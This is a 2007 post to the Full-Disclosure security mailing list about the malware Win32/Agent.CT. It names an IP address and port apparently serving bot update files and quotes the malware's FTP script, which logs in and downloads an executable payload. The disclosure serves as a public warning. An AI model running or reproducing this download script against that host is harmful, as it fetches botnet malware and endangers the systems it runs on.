[Full-disclosure] Script from Win32/Agent.CT
FocusVirus
virus at frij.com
Wed Jan 10 22:44:31 GMT 2007
I attempted to download this but was dropped by the FTP server.
Host 61.36.242.10 is listening on port 5444 and appears to be hosting bot
update files.
Headers - 220 Serv-U FTP Server v5.0 for WinSock ready...
Script for filedownload is
> open 61.36.242.10 5444
> user 1 1
> get kage . exe <----
> quit
Was locked out on my first attempt, password was incorrect. Lock down your
connections now! :)
Full-Disclosure is hosted and sponsored by Secunia.